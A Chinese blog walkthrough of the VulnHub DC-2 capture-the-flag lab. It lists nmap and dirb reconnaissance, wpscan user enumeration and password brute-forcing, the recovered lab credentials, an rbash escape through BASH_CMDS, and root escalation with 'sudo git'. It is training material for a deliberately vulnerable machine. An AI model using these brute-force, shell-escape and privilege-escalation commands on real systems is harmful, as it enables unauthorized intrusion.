DC-2通关基本步骤

  • 环境搭建:

与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始,和DC-1一样,有五个flag

2,靶场下载环境为:https://www.vulnhub.com/entry/dc-2,311/

二,渗透靶场

1,攻击目标:就是我们搭建的dc靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2、信息收集:寻找靶机真实IP(自己虚拟机的IP)

命令:nmap -sP 192.168.0.10

3,信息收集:探寻端口和服务

命令:nmap -A -p- -v 192.168.0.11

发现开放了80端口,存在web服务,Apache/2.4.10,

发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1

4,接下来访问web站点

发现页面访问不了,我们需要修改hosts文件,添加一个IP域名指向

5,修改hosts文件

命令:vim /etc/hosts

添加成功后再去访问即可成功

三,发现flag1

这些大概意思是:你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录,就是暴力破解账号,密码

四,目录扫描

命令:dirb http://dc-2/

发现有个像后台地址,在火狐页面登录,但是没什么可以用的东西图一乐就行

五,用户名枚举

Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

1,扫描一下WordPress版本

命令:wpscan --url http://dc-2

然后发现了WordPress4.7.10版本

2,在登录页面登录一下,输入账号和密码,但是提示不存在此用户,可以用用户枚举

六,先用个用户枚举,尝试得到用户爆破密码

命令:wpscan --url http://dc-2 --enumerate u

 枚举出了三个:admin   jerry   tom

七,使用暴力破解出账号和密码

命令:cewl http://dc-2/ -w dc2..txt

1,使用wpscan进行暴力破解

命令:wpscan --url http://dc-2 --passwords dc2.txt

看到爆破出了两个账号

2,jerry/adipiscing     tom/parturient使用这两个登录站点

jerry/adipiscing登录页面

 tom/parturient登录页面

八,发现flag2

登录后看到flag2,我用的Jerry账号登录的

点开flag2看到提示信息,如果WordPress不行的话我们可以看看ssh

意思就是:

如果你不能利用WordPress并采取一条捷径,还有另外一种方法,希望你找到了另一个入口

九,在tom的家目录发现flag3

1.先登录ssh

命令;ssh tom@192.168.0.11 -p 7744

然后发现了flag3

2,我们发现了 less和vi可以来查看,内容显示如下

3,然后使用rbash绕过详情参考:https://xz.aliyun.com/t/7642

命令;echo $PATH,使用cd加目录进不去,使用ls直接查看目录内的信息

4,使用命令绕过rbash:

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

十,1.在Jerry家目录发现了flag4

2,然后输入命令:cat flag4.txt

大概意思:

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

很高兴看到你走了这么远,但你还没回家,您仍然需要获得最后的标志(唯一真正重要的标志,这里没有暗示,你现在只能靠自己了,继续,猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

3,我们使用tom来运行sudo,切换到Jerry用户

命令:sudo -l

十一,提权

1,查看可以使用的root权限命令

命令:find / -user root -perm -4000 -print 2>/dev/null

2,Jerry用户不可直接使用sudo su

使用git进行提取

命令:sudo git help status

这样提权成功

十二,发现final-flag。txt

命令:cd /root

cat final-flag.txt

恭喜贺喜宝子们通过了哈哈哈,太厉害了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值